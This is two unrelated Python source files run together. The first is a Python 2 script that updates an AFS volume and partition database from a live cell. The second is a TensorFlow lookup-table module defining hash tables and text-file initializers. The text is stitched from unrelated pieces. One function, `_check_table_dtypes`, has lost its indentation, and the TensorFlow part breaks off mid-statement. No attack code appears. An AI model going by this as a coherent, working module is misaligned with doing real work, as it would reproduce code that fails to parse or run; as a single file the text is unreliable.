myParser=argparse.ArgumentParser(parents=[afs.argParser], add_help=False)
myParser.add_argument("--force", action='store_true',default=False, help="force re-check")
myParser.add_argument("--create", action='store_true',default=False, help="create new DB.")
myParser.add_argument("--onlySP", default="", help="check only server_partition")
myParser.add_argument("--stat", action='store_true', default=False, help="do not query live-system, but only update DB-internal sums")
parseDefaultConfig(myParser)
# Module-level service/LLA singletons shared by all functions below.
VLLA=OSDVolumeLLA()
CS=OSDCellService()
FS=OSDFsService()
VS=OSDVolService()
DBsS=DBsService()
DBM=DBManager()
PS=ProjectService()
ULLA=UbikPeerLLA()
def main() :
    """Refresh the AFS volume/partition database from the live cell.

    Behaviour is driven by afs.defaultConfig flags:
      --create : rebuild the DB from scratch (bypass all caches)
      --force  : update even when the cached VLDB version matches
      --onlySP : restrict the update to one server_partition (part '*' = all)
      --stat   : recompute DB-internal per-partition sums only
    """
    if afs.defaultConfig.create :
        use_cache=False
    else :
        use_cache=True
    VLDBup2date=False
    # if we have a specified partition, do only just that.
    if afs.defaultConfig.onlySP != "" :
        # full update
        f,p=afs.defaultConfig.onlySP.split("_")
        print "Server: {0}".format(f)
        FileServer=FS.getFileServer(name_or_ip=f,cached=use_cache)
        if p == "*" :
            # wildcard: all partitions of the server, in sorted order
            partnames=FileServer.parts.keys()
            partnames.sort()
        else :
            partnames=[p,]
        for part in partnames :
            print "part: {0}".format(part)
            do_updatePartition(FileServer,f,part,use_cache)
        sys.exit(0)
    # update DB-internal sums only
    if afs.defaultConfig.stat :
        cachedCell=CS.getCellInfo(cached=True)
        for f in cachedCell.FileServers :
            print "Server: {0}".format(f)
            FileServer=FS.getFileServer(name_or_ip=f,cached=True)
            partnames=FileServer.parts.keys()
            for part in partnames :
                print "part: {0}".format(part)
                do_update_ExtPartAttr(FileServer,part)
        sys.exit(0)
    if not afs.defaultConfig.create :
        cachedCell=CS.getCellInfo(cached=True)
        liveCell=CS.getCellInfo(cached=False)
        # live_VLDBVersion=ULLA.getShortInfo(cachedCell.DBServers[0],7003,None,None)["SyncSiteDBVersion"]
        # update if required
        if cachedCell :
            # compare versions as strings to sidestep type differences
            if "%s" % cachedCell.VLDBVersion == "%s" % liveCell.VLDBVersion :
                print "VLDB Versions considered equal (cached: '{0}',live:'{1}').".format(cachedCell.VLDBVersion,liveCell.VLDBVersion)
                VLDBup2date = True
            else :
                print "VLDB Versions differ ('{0}' != '{1}').".format(cachedCell.VLDBVersion,liveCell.VLDBVersion)
                VLDBup2date = False
        else :
            VLDBup2date = True
    else :
        liveCell=CS.getCellInfo(cached=False)
    # first update DBServer
    for db in liveCell.DBServers :
        print "Server: {0}".format(db)
        VLDBServer=DBsS.getDBServer(db,"vldb")
        PTDBServer=DBsS.getDBServer(db,"ptdb")
    ignoreFS=[]
    # then FileServer
    for f in liveCell.FileServers :
        print "Server: {0}".format(f)
        try :
            FileServer=FS.getFileServer(name_or_ip=f)
        except:
            # unreachable fileservers are skipped later in the update loops
            ignoreFS.append(f)
    if not afs.defaultConfig.force :
        if afs.defaultConfig.create :
            print "Re-creation of Database forced."
        else :
            if VLDBup2date :
                print "Don't update"
                sys.exit(0)
    else :
        if afs.defaultConfig.create :
            print "Re-creation of Database forced."
        else :
            print "Update forced."
    if not afs.defaultConfig.create :
        # check volume-list of all server partitions and compare live and db-lists
        # to see what has changed
        for f in liveCell.FileServers :
            print "Server: {0}".format(f)
            if f in ignoreFS :
                print "ignored because of previous error."
                continue
            FileServer=FS.getFileServer(name_or_ip=f)
            partnames=FileServer.parts.keys()
            partnames.sort()
            for part in partnames :
                print "part: {0}...".format(part),
                vols_live=FS.getVolumeIDs(f,part=part,cached=False)
                vols_live.sort()
                vols_cached=[]
                for v in DBM.executeRaw('SELECT vid FROM tbl_volume WHERE serv_uuid="%s" AND part="%s";' % (FileServer.uuid,part)).fetchall() :
                    vols_cached.append(v[0])
                vols_cached.sort()
                if vols_cached != vols_live :
                    print "modified, updating..."
                    # XXX here, we should just update the volumes which changed
                    do_updatePartition(FileServer,f,part,use_cache)
                else :
                    print "OK"
    else : # do full update of all volumes
        # full update
        for f in liveCell.FileServers :
            print "Server: {0}".format(f)
            if f in ignoreFS :
                print "ignored because of previous error."
                continue
            FileServer=FS.getFileServer(name_or_ip=f,cached=use_cache)
            partnames=FileServer.parts.keys()
            partnames.sort()
            for part in partnames :
                print "part: {0}".format(part)
                do_updatePartition(FileServer,f,part,use_cache)
    sys.exit(0)
def do_updatePartition(FileServer,f,part,use_cache) :
    """Refresh one server partition: re-cache its volumes, then its sums."""
    # update all Volume information in DB
    # this includes ExtVolAttr and ExtVolAttr_OSD
    FS.bulk_cacheVolumes(f,part)
    # recompute the per-partition aggregate attributes from the fresh data
    do_update_ExtPartAttr(FileServer,part)
    return
def do_update_ExtPartAttr(FileServer,part) :
    """Recompute and store aggregate quota/volume counts for one partition.

    Sums maxquota over RW volumes plus "single" RO volumes (ROs without a
    sibling), both overall and for volumes not updated in ~6 months (stale).
    """
    # get time 6 Months ago
    StaleDate=datetime.timedelta(days=-183)
    # NOTE(review): .now() is a classmethod, so the (1970,1,1) instance is
    # ignored and this is simply "now - 183 days" — confirm intent.
    dateStale=datetime.datetime(1970, 1, 1).now()+StaleDate
    # allocated is tricky, we want to use single ROs, but not accompanying RO's.
    # get stats for RW
    #FS.DBManager.Logger.setLevel(logging.DEBUG)
    SQL='SELECT SUM(maxquota) FROM tbl_volume WHERE updateDate < "%s" AND type="RW" AND serv_uuid="%s" AND part="%s"' % (dateStale,FileServer.uuid,part)
    allocated_stale=FS.DBManager.executeRaw(SQL).fetchone()[0]
    # SUM() yields NULL/None on an empty set; normalize to 0
    if allocated_stale == None :
        allocated_stale = 0
    #FS.DBManager.Logger.setLevel(logging.WARN)
    SQL='SELECT SUM(maxquota) FROM tbl_volume WHERE type="RW" AND serv_uuid="%s" AND part="%s"' % (FileServer.uuid,part)
    allocated=FS.DBManager.executeRaw(SQL).fetchone()[0]
    if allocated == None :
        allocated = 0
    SQL='SELECT COUNT(maxquota) FROM tbl_volume WHERE type="RW" AND serv_uuid="%s" AND part="%s" AND maxquota="0"' % (FileServer.uuid,part)
    unLimitedVolumes=FS.DBManager.executeRaw(SQL).fetchone()[0]
    # get stats for single RO
    SQL='SELECT SUM(maxquota) FROM (SELECT type,parentID,maxquota FROM tbl_volume WHERE updateDate < "%s" AND serv_uuid="%s" AND part="%s" GROUP BY parentID HAVING COUNT(parentID) = 1) as T1 WHERE T1.type="RO";' % (dateStale,FileServer.uuid,part)
    _allo=FS.DBManager.executeRaw(SQL).fetchone()[0]
    if _allo == None : _allo = 0
    allocated_stale += _allo
    SQL='SELECT SUM(maxquota) FROM (SELECT type,parentID,maxquota FROM tbl_volume WHERE serv_uuid="%s" AND part="%s" GROUP BY parentID HAVING COUNT(parentID) = 1) as T1 WHERE T1.type="RO";' % (FileServer.uuid,part)
    _allo=FS.DBManager.executeRaw(SQL).fetchone()[0]
    if _allo == None : _allo = 0
    allocated += _allo
    SQL='SELECT COUNT(maxquota) FROM (SELECT type,parentID,maxquota FROM tbl_volume WHERE serv_uuid="%s" AND part="%s" AND maxquota ="0" GROUP BY parentID HAVING COUNT(parentID) = 1) as T1 WHERE T1.type="RO";' % (FileServer.uuid,part)
    # NOTE(review): this overwrites the RW count computed above instead of
    # adding to it (unlike allocated, which uses +=) — likely a '+=' bug.
    unLimitedVolumes=FS.DBManager.executeRaw(SQL).fetchone()[0]
    numRW,numRO,numBK,numOffline=FS.getNumVolumes(name_or_ip=FileServer.servernames[0],part=part,cached=True)
    # NOTE(review): projectIDs is always stored empty here — confirm whether
    # population was intended (PS service is imported but unused).
    projectIDs={}
    ExtPart=ExtPartAttr(FileServer.uuid,part)
    ExtPart.allocated=allocated
    ExtPart.allocated_stale=allocated_stale
    ExtPart.unLimitedVolumes=unLimitedVolumes
    #FS.Logger.setLevel(logging.DEBUG)
    #FS.DBManager.Logger.setLevel(logging.DEBUG)
    #FS.Logger.setLevel(logging.WARN)
    #FS.DBManager.Logger.setLevel(logging.WARN)
    ExtPart.numRW=numRW
    ExtPart.numRO=numRO
    ExtPart.numBK=numBK
    ExtPart.numOffline=numOffline
    ExtPart.projectIDs=projectIDs
    # persist the aggregate record for this (server, partition) pair
    FS.DBManager.setIntoCache(ExtPartAttr,ExtPart,serv_uuid=FileServer.uuid,name=part)
    print "server %s part %s: numRW=%s, numRO=%s,numBK=%s,numOffline=%s,allocated=%s,allocated_stale=%s" % (FileServer.servernames[0],part,numRW,numRO,numBK,numOffline,allocated,allocated_stale)
    return
if __name__=="__main__" :
    # Uncomment to profile a run instead of executing it directly.
    #cProfile.run('main()',"updateDB.prof")
    main()
| |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#==============================================================================
"""Lookup operations."""
# pylint: disable=g-bad-name
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import functools
import six
from tensorflow.python.eager import context
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import gen_lookup_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import string_ops
# go/tf-wildcard-import
# pylint: disable=wildcard-import
from tensorflow.python.ops.gen_lookup_ops import *
# pylint: enable=wildcard-import
from tensorflow.python.util import compat
from tensorflow.python.util.deprecation import deprecated
from tensorflow.python.util.tf_export import tf_export
@tf_export("initialize_all_tables")
@deprecated(None, "Use `tf.tables_initializer` instead.")
def initialize_all_tables(name="init_all_tables"):
  """Deprecated alias for `tables_initializer`.

  Args:
    name: Optional name for the initialization op.

  Returns:
    An Op that initializes every table registered in the default graph;
    a NoOp when no tables are registered.
  """
  return tables_initializer(name)
@tf_export("tables_initializer")
def tables_initializer(name="init_all_tables"):
  """Returns an Op that initializes all tables of the default graph.

  Args:
    name: Optional name for the initialization op.

  Returns:
    An Op that initializes all tables.  If the graph contains no tables,
    the returned Op is a NoOp.
  """
  table_init_ops = ops.get_collection(ops.GraphKeys.TABLE_INITIALIZERS)
  if not table_init_ops:
    return control_flow_ops.no_op(name=name)
  return control_flow_ops.group(*table_init_ops, name=name)
def _check_table_dtypes(table, key_dtype, value_dtype):
"""Check that the given key_dtype and value_dtype matches the table dtypes.
Args:
table: The table to check types against to.
key_dtype: The key data type to check.
value_dtype: The value data type to check.
Raises:
TypeError: when 'key_dtype' or 'value_dtype' doesn't match the table data
types.
"""
if key_dtype.base_dtype != table.key_dtype:
raise TypeError("Invalid key dtype, expected %s but got %s." %
(table.key_dtype, key_dtype))
if value_dtype.base_dtype != table.value_dtype:
raise TypeError("Invalid value dtype, expected %s but got %s." %
(table.value_dtype, value_dtype))
class LookupInterface(object):
  """Represent a lookup table that persists across different steps."""

  def __init__(self, key_dtype, value_dtype, name):
    """Construct a lookup table interface.

    Args:
      key_dtype: The table key type.
      value_dtype: The table value type.
      name: A name for the operation (optional).
    """
    # Normalize to DType instances so comparisons against tensor dtypes work.
    self._key_dtype = dtypes.as_dtype(key_dtype)
    self._value_dtype = dtypes.as_dtype(value_dtype)
    self._name = name

  @property
  def name(self):
    """The name of the table."""
    return self._name

  @property
  def key_dtype(self):
    """The table key dtype."""
    return self._key_dtype

  @property
  def value_dtype(self):
    """The table value dtype."""
    return self._value_dtype

  @property
  def init(self):
    """The table initialization op."""
    raise NotImplementedError

  def size(self, name=None):
    """Compute the number of elements in this table."""
    raise NotImplementedError

  def lookup(self, keys, name=None):
    """Looks up `keys` in a table, outputs the corresponding values."""
    raise NotImplementedError
class InitializableLookupTableBase(LookupInterface):
  """Initializable lookup table interface.

  An initializable lookup table persists across different steps.
  """

  def __init__(self, table_ref, default_value, initializer):
    """Construct a table object from a table reference.

    Requires a table initializer object (subclass of `TableInitializerBase`),
    which provides the table key and value types as well as the op that
    initializes the table.  The caller is responsible for executing the
    initialization op.

    Args:
      table_ref: The table reference, i.e. the output of the lookup table ops.
      default_value: The value to use if a key is missing in the table.
      initializer: The table initializer to use.
    """
    # Eager mode has no op graph to derive a name from; use the active scope.
    if context.executing_eagerly():
      name = context.context().scope_name
    else:
      name = table_ref.op.name.split("/")[-1]
    super(InitializableLookupTableBase, self).__init__(
        initializer.key_dtype, initializer.value_dtype, name)
    self._table_ref = table_ref
    self._default_value = ops.convert_to_tensor(
        default_value, dtype=self._value_dtype)
    # The default value must be a scalar.
    self._default_value.get_shape().merge_with(tensor_shape.scalar())
    self._init = initializer.initialize(self)

  @property
  def table_ref(self):
    """Get the underlying table reference."""
    return self._table_ref

  @property
  def default_value(self):
    """The default value of the table."""
    return self._default_value

  @property
  def init(self):
    """The table initialization op."""
    return self._init

  def size(self, name=None):
    """Compute the number of elements in this table.

    Args:
      name: A name for the operation (optional).

    Returns:
      A scalar tensor containing the number of elements in this table.
    """
    with ops.name_scope(
        name, "%s_Size" % self._name, [self._table_ref]) as scope:
      return gen_lookup_ops.lookup_table_size_v2(self._table_ref, name=scope)

  def lookup(self, keys, name=None):
    """Looks up `keys` in a table, outputs the corresponding values.

    The `default_value` is used for keys not present in the table.

    Args:
      keys: Keys to look up. May be either a `SparseTensor` or dense `Tensor`.
      name: A name for the operation (optional).

    Returns:
      A `SparseTensor` if keys are sparse, otherwise a dense `Tensor`.

    Raises:
      TypeError: when `keys` or `default_value` doesn't match the table data
        types.
    """
    if keys.dtype.base_dtype != self._key_dtype:
      raise TypeError("Signature mismatch. Keys must be dtype %s, got %s." %
                      (self._key_dtype, keys.dtype))
    is_sparse = isinstance(keys, sparse_tensor.SparseTensor)
    # For sparse input, only the values are looked up; indices pass through.
    key_tensor = keys.values if is_sparse else keys
    with ops.name_scope(
        name, "%s_Lookup" % self._name,
        (self._table_ref, key_tensor, self._default_value)) as scope:
      values = gen_lookup_ops.lookup_table_find_v2(
          self._table_ref, key_tensor, self._default_value, name=scope)
      values.set_shape(key_tensor.get_shape())
    if is_sparse:
      return sparse_tensor.SparseTensor(keys.indices, values, keys.dense_shape)
    return values
class HashTable(InitializableLookupTableBase):
  """A generic hash table implementation.

  Example usage:

  ```python
  table = tf.HashTable(
      tf.KeyValueTensorInitializer(keys, values), -1)
  out = table.lookup(input_tensor)
  table.init.run()
  print(out.eval())
  ```
  """

  def __init__(self, initializer, default_value, shared_name=None, name=None):
    """Creates a non-initialized `HashTable` object.

    Creates a table whose key and value types are given by the initializer.
    Before using the table you will have to initialize it.  After
    initialization the table will be immutable.

    Args:
      initializer: The table initializer to use. See `HashTable` kernel for
        supported key and value types.
      default_value: The value to use if a key is missing in the table.
      shared_name: If non-empty, this table will be shared under
        the given name across multiple sessions.
      name: A name for the operation (optional).

    Returns:
      A `HashTable` object.
    """
    with ops.name_scope(
        name, "hash_table", (initializer, default_value)) as scope:
      table_ref = gen_lookup_ops.hash_table_v2(
          shared_name=shared_name,
          key_dtype=initializer.key_dtype,
          value_dtype=initializer.value_dtype,
          name=scope)

      # Initialization (triggered by the base class) happens inside the
      # "hash_table" name scope.
      super(HashTable, self).__init__(table_ref, default_value, initializer)
class TableInitializerBase(object):
  """Base class for lookup table initializers."""

  def __init__(self, key_dtype, value_dtype):
    """Construct a table initializer object.

    Args:
      key_dtype: Type of the table keys.
      value_dtype: Type of the table values.
    """
    # Normalize both dtypes up front so subclasses see DType instances.
    self._key_dtype, self._value_dtype = (dtypes.as_dtype(key_dtype),
                                          dtypes.as_dtype(value_dtype))

  @property
  def key_dtype(self):
    """The expected table key dtype."""
    return self._key_dtype

  @property
  def value_dtype(self):
    """The expected table value dtype."""
    return self._value_dtype

  def initialize(self, table):
    """Returns the table initialization op."""
    raise NotImplementedError
class KeyValueTensorInitializer(TableInitializerBase):
  """Table initializers given `keys` and `values` tensors."""

  def __init__(self, keys, values, key_dtype=None, value_dtype=None, name=None):
    """Constructs a table initializer object based on keys and values tensors.

    Args:
      keys: The tensor for the keys.
      values: The tensor for the values.
      key_dtype: The `keys` data type. Used when `keys` is a python array.
      value_dtype: The `values` data type. Used when `values` is a python
        array.
      name: A name for the operation (optional).
    """
    with ops.name_scope(name, "key_value_init", [keys, values]) as scope:
      self._name = scope
      self._keys = ops.convert_to_tensor(keys, dtype=key_dtype, name="keys")
      self._values = ops.convert_to_tensor(
          values, dtype=value_dtype, name="values")
    super(KeyValueTensorInitializer, self).__init__(self._keys.dtype,
                                                    self._values.dtype)

  def initialize(self, table):
    """Initializes the given `table` with `keys` and `values` tensors.

    Args:
      table: The table to initialize.

    Returns:
      The operation that initializes the table.

    Raises:
      TypeError: when the keys and values data types do not match the table
        key and value data types.
    """
    _check_table_dtypes(table, self._keys.dtype, self._values.dtype)
    with ops.name_scope(
        self._name,
        values=(table.table_ref, self._keys, self._values)) as scope:
      init_op = gen_lookup_ops.initialize_table_v2(
          table.table_ref, self._keys, self._values, name=scope)
    # Register so `tf.tables_initializer()` picks this table up.
    ops.add_to_collection(ops.GraphKeys.TABLE_INITIALIZERS, init_op)
    return init_op
class TextFileIndex(object):
  """Sentinel column indices understood by `TextFileInitializer`."""
  # Use the entire line content as the key/value (expects string dtype).
  WHOLE_LINE = -2
  # Use the zero-based line number as the key/value (expects int64 dtype).
  LINE_NUMBER = -1
class TextFileInitializer(TableInitializerBase):
  """Table initializers from a text file.

  This initializer assigns one entry in the table for each line in the file.

  The key and value type of the table to initialize is given by `key_dtype` and
  `value_dtype`.

  The key and value content to get from each line is specified by
  the `key_index` and `value_index`.

  * `TextFileIndex.LINE_NUMBER` means use the line number starting from zero,
    expects data type int64.
  * `TextFileIndex.WHOLE_LINE` means use the whole line content, expects data
    type string.
  * A value `>=0` means use the index (starting at zero) of the split line based
    on `delimiter`.

  For example if we have a file with the following content:

  ```
  emerson 10
  lake 20
  palmer 30
  ```

  The following snippet initializes a table with the first column as keys and
  second column as values:

  * `emerson -> 10`
  * `lake -> 20`
  * `palmer -> 30`

  ```python
  table = tf.contrib.lookup.HashTable(tf.contrib.lookup.TextFileInitializer(
      "test.txt", tf.string, 0, tf.int64, 1, delimiter=" "), -1)
  ...
  table.init.run()
  ```

  Similarly to initialize the whole line as keys and the line number as values.

  * `emerson 10 -> 0`
  * `lake 20 -> 1`
  * `palmer 30 -> 2`

  ```python
  table = tf.contrib.lookup.HashTable(tf.contrib.lookup.TextFileInitializer(
      "test.txt", tf.string, tf.contrib.lookup.TextFileIndex.WHOLE_LINE,
      tf.int64, tf.contrib.lookup.TextFileIndex.LINE_NUMBER, delimiter=" "), -1)
  ...
  table.init.run()
  ```
  """

  def __init__(self,
               filename,
               key_dtype,
               key_index,
               value_dtype,
               value_index,
               vocab_size=None,
               delimiter="\t",
               name=None):
    """Constructs a table initializer object to populate from a text file.

    It generates one key-value pair per line. The type of table key and
    value are specified by `key_dtype` and `value_dtype`, respectively.
    Similarly the content of the key and value are specified by the key_index
    and value_index.

    - TextFileIndex.LINE_NUMBER means use the line number starting from zero,
      expects data type int64.
    - TextFileIndex.WHOLE_LINE means use the whole line content, expects data
      type string.
    - A value >=0 means use the index (starting at zero) of the split line based
      on `delimiter`.

    Args:
      filename: The filename of the text file to be used for initialization.
        The path must be accessible from wherever the graph is initialized
        (eg. trainer or eval workers). The filename may be a scalar `Tensor`.
      key_dtype: The `key` data type.
      key_index: the index that represents information of a line to get the
        table 'key' values from.
      value_dtype: The `value` data type.
      value_index: the index that represents information of a line to get the
        table 'value' values from.'
      vocab_size: The number of elements in the file, if known.
      delimiter: The delimiter to separate fields in a line.
      name: A name for the operation (optional).

    Raises:
      ValueError: when the filename is empty, or when the table key and value
        data types do not match the expected data types.
    """
    # A tensor-valued filename is only known at run time, so emptiness can
    # only be validated for plain Python values here.
    if not isinstance(filename, ops.Tensor) and not filename:
      raise ValueError("Filename required for %s." % name)

    key_dtype = dtypes.as_dtype(key_dtype)
    value_dtype = dtypes.as_dtype(value_dtype)

    # Valid indices are >= 0 or one of the two negative sentinels above.
    if key_index < -2:
      raise ValueError("Invalid key index %s." % (key_index))

    if key_index == TextFileIndex.LINE_NUMBER and key_dtype != dtypes.int64:
      raise ValueError("Signature mismatch. Keys must be dtype %s, got %s." %
                       (dtypes.int64, key_dtype))
    # NOTE: unlike values, whole-line *keys* also accept integer dtypes
    # (the condition below only rejects non-integer, non-string key dtypes).
    if ((key_index == TextFileIndex.WHOLE_LINE) and
        (not key_dtype.is_integer) and (key_dtype != dtypes.string)):
      raise ValueError(
          "Signature mismatch. Keys must be integer or string, got %s." %
          key_dtype)
    if value_index < -2:
      raise ValueError("Invalid value index %s." % (value_index))

    if value_index == TextFileIndex.LINE_NUMBER and value_dtype != dtypes.int64:
      raise ValueError("Signature mismatch. Values must be dtype %s, got %s." %
                       (dtypes.int64, value_dtype))
    if value_index == TextFileIndex.WHOLE_LINE and value_dtype != dtypes.string:
      raise ValueError("Signature mismatch. Values must be dtype %s, got %s." %
                       (dtypes.string, value_dtype))

    if (vocab_size is not None) and (vocab_size <= 0):
      raise ValueError("Invalid vocab_size %s." % vocab_size)

    self._filename = filename
    self._key_index = key_index
    self._value_index = value_index
    self._vocab_size = vocab_size
    self._delimiter = delimiter
    self._name = name

    super(TextFileInitializer, self).__init__(key_dtype, value_dtype)

  def initialize(self, table):
    """Initializes the table from a text file.

    Args:
      table: The table to be initialized.

    Returns:
      The operation that initializes the table.

    Raises:
      TypeError: when the keys and values data types do not match the table
        key and value data types.
    """
    _check_table_dtypes(table, self.key_dtype, self.value_dtype)
    with ops.name_scope(self._name, "text_file_init",
                        (table.table_ref,)) as scope:
      filename = ops.convert_to_tensor(
          self._filename, dtypes.string, name="asset_filepath")
      # -1 tells the kernel the vocabulary size is unknown.
      init_op = gen_lookup_ops.initialize_table_from_text_file_v2(
          table.table_ref,
          filename,
          self._key_index,
          self._value_index,
          -1 if self._vocab_size is None else self._vocab_size,
          self._delimiter,
          name=scope)
    ops.add_to_collection(ops.GraphKeys.TABLE_INITIALIZERS, init_op)
    # If the filename tensor is anything other than a string constant (e.g., if
    # it is a placeholder) then it does not make sense to track it as an asset.
    if not context.executing_eagerly() and constant_op.is_constant(filename):
      ops.add_to_collection(ops.GraphKeys.ASSET_FILEPATHS, filename)
    return init_op
class TextFileStringTableInitializer(TextFileInitializer):
  """Table initializer for `int64` IDs to string tables from a text file."""

  def __init__(self,
               filename,
               key_column_index=TextFileIndex.LINE_NUMBER,
               value_column_index=TextFileIndex.WHOLE_LINE,
               vocab_size=None,
               delimiter="\t",
               name="text_file_string_table_init"):
    """Constructs an initializer for an id-to-string table from a text file.

    Populates a table whose key and value types are int64 and string,
    respectively, generating one key-value pair per line.  Which part of
    each line becomes the key and the value is controlled by
    `key_column_index` and `value_column_index`:

    - TextFileIndex.LINE_NUMBER means use the line number starting from zero,
      expects data type int64.
    - TextFileIndex.WHOLE_LINE means use the whole line content, expects data
      type string.
    - A value >=0 means use the index (starting at zero) of the split line
      based on `delimiter`.

    Args:
      filename: The filename of the text file to be used for initialization.
        The path must be accessible from wherever the graph is initialized
        (eg. trainer or eval workers). The filename may be a scalar `Tensor`.
      key_column_index: The column index from the text file to get the keys
        from. The default is to use the line number, starting from zero.
      value_column_index: The column index from the text file to get the
        values from. The default is to use the whole line content.
      vocab_size: The number of elements in the file, if known.
      delimiter: The delimiter to separate fields in a line.
      name: Optional name for the op.

    Raises:
      TypeError: when the filename is empty, or when the table key and value
        data types do not match the expected data types.
    """
    # Keys are always int64 and values always string for this initializer.
    super(TextFileStringTableInitializer, self).__init__(
        filename,
        key_dtype=dtypes.int64,
        key_index=key_column_index,
        value_dtype=dtypes.string,
        value_index=value_column_index,
        vocab_size=vocab_size,
        delimiter=delimiter,
        name=name)
class TextFileIdTableInitializer(TextFileInitializer):
  """Table initializer for string to `int64` IDs tables from a text file."""

  def __init__(self,
               filename,
               key_column_index=TextFileIndex.WHOLE_LINE,
               value_column_index=TextFileIndex.LINE_NUMBER,
               vocab_size=None,
               delimiter="\t",
               name="text_file_id_table_init",
               key_dtype=dtypes.string):
    """Constructs an initializer for an string-to-id table from a text file.

    Populates a table whose key and value types are string and int64,
    respectively, generating one key-value pair per line.  Which part of
    each line becomes the key and the value is controlled by
    `key_column_index` and `value_column_index`:

    - TextFileIndex.LINE_NUMBER means use the line number starting from zero,
      expects data type int64.
    - TextFileIndex.WHOLE_LINE means use the whole line content, expects data
      type string.
    - A value >=0 means use the index (starting at zero) of the split line
      based on `delimiter`.

    Args:
      filename: The filename of the text file to be used for initialization.
        The path must be accessible from wherever the graph is initialized
        (eg. trainer or eval workers). The filename may be a scalar `Tensor`.
      key_column_index: The column index from the text file to get the `key`
        values from. The default is to use the whole line content.
      value_column_index: The column index from the text file to get the
        `value` values from. The default is to use the line number, starting
        from zero.
      vocab_size: The number of elements in the file, if known.
      delimiter: The delimiter to separate fields in a line.
      name: Optional name for the op.
      key_dtype: The `key` data type.

    Raises:
      TypeError: when the filename is empty, or when the table key and value
        data types do not match the expected data types.
    """
    # Values are always int64 IDs for this initializer.
    super(TextFileIdTableInitializer, self).__init__(
        filename,
        key_dtype=key_dtype,
        key_index=key_column_index,
        value_dtype=dtypes.int64,
        value_index=value_column_index,
        vocab_size=vocab_size,
        delimiter=delimiter,
        name=name)
class HasherSpec(collections.namedtuple("HasherSpec", ("hasher", "key"))):
  """A structure for the spec of the hashing function to use for hash buckets.

  `hasher` names the hashing function to use (eg. "fasthash", "stronghash").
  `key` is optional and specifies the key to use for the hash function if
  supported; currently it is only used by a strong hash.

  Fields:
    hasher: The hasher name to use.
    key: The key to be used by the hashing function, if required.
  """
  __slots__ = ()


FastHashSpec = HasherSpec("fasthash", None)  # pylint: disable=invalid-name
class StrongHashSpec(HasherSpec):
  """A structure to specify a key of the strong keyed hash spec.

  The strong hash requires a `key`, which is a list of 2 unsigned integer
  numbers. These should be non-zero; random numbers generated from random.org
  would be a fine choice.

  Fields:
    key: The key to be used by the keyed hashing function.
  """
  __slots__ = ()

  def __new__(cls, key):
    if len(key) != 2:
      raise ValueError("key must have size 2, got %s." % len(key))

    if not isinstance(key[0], compat.integral_types) or not isinstance(
        key[1], compat.integral_types):
      raise TypeError("Invalid key %s. Must be unsigned integer values." % key)

    # `super` takes (class, subclass-or-instance) in that order. The previous
    # code passed them swapped (`super(cls, StrongHashSpec)`), which happens
    # to work when `cls is StrongHashSpec` but raises TypeError for any
    # further subclass of StrongHashSpec.
    return super(StrongHashSpec, cls).__new__(cls, "stronghash", key)
def _as_string(tensor):
  """Cast `tensor` to string dtype; string tensors pass through unchanged."""
  if tensor.dtype.base_dtype == dtypes.string:
    return tensor
  return string_ops.as_string(tensor)
class IdTableWithHashBuckets(LookupInterface):
  """String to Id table wrapper that assigns out-of-vocabulary keys to buckets.

  For example, if an instance of `IdTableWithHashBuckets` is initialized with a
  string-to-id table that maps:

  * `emerson -> 0`
  * `lake -> 1`
  * `palmer -> 2`

  The `IdTableWithHashBuckets` object will perform the following mapping:

  * `emerson -> 0`
  * `lake -> 1`
  * `palmer -> 2`
  * `<other term> -> bucket_id`, where bucket_id will be between `3` and
  `3 + num_oov_buckets - 1`, calculated by:
  `hash(<term>) % num_oov_buckets + vocab_size`

  If input_tensor is `["emerson", "lake", "palmer", "king", "crimson"]`,
  the lookup result is `[0, 1, 2, 4, 7]`.

  If `table` is None, only out-of-vocabulary buckets are used.

  Example usage:

  ```python
  num_oov_buckets = 3
  input_tensor = tf.constant(["emerson", "lake", "palmer", "king", "crimnson"])
  table = tf.IdTableWithHashBuckets(
      tf.HashTable(tf.TextFileIdTableInitializer(filename), default_value),
      num_oov_buckets)
  out = table.lookup(input_tensor)
  table.init.run()
  print(out.eval())
  ```

  The hash function used for generating out-of-vocabulary buckets ID is handled
  by `hasher_spec`.
  """

  def __init__(self,
               table,
               num_oov_buckets,
               hasher_spec=FastHashSpec,
               name=None,
               key_dtype=None):
    """Construct a `IdTableWithHashBuckets` object.

    Args:
      table: Table that maps `tf.string` or `tf.int64` keys to `tf.int64` ids.
      num_oov_buckets: Number of buckets to use for out-of-vocabulary keys.
      hasher_spec: A `HasherSpec` to specify the hash function to use for
        assignation of out-of-vocabulary buckets (optional).
      name: A name for the operation (optional).
      key_dtype: Data type of keys passed to `lookup`. Defaults to
        `table.key_dtype` if `table` is specified, otherwise `tf.string`.
        Must be string or integer, and must be castable to `table.key_dtype`.

    Raises:
      ValueError: when `table` in None and `num_oov_buckets` is not positive.
      TypeError: when `hasher_spec` is invalid.
    """
    # If a name ends with a '/' it is a "name scope", remove all trailing '/'
    # characters to use as table name.
    if name:
      name = name.rstrip("/")
    if table:
      if key_dtype is None:
        key_dtype = table.key_dtype
      supported_table_key_dtypes = (dtypes.int64, dtypes.string)
      if table.key_dtype not in supported_table_key_dtypes:
        # Report the table's key dtype here: it is the value being validated.
        # (`key_dtype` may be a different caller-supplied dtype, so reporting
        # it, as previous revisions did, could mislead.)
        raise TypeError("Invalid key dtype, expected one of %s, but got %s." %
                        (supported_table_key_dtypes, table.key_dtype))
      # `key_dtype` need not equal the table's dtype, but its integer-ness
      # must match so values can be cast before the table lookup.
      if table.key_dtype.is_integer != key_dtype.is_integer:
        raise TypeError("Invalid key dtype, expected %s but got %s." %
                        ("integer" if key_dtype.is_integer else "non-integer",
                         table.key_dtype))
      if table.value_dtype != dtypes.int64:
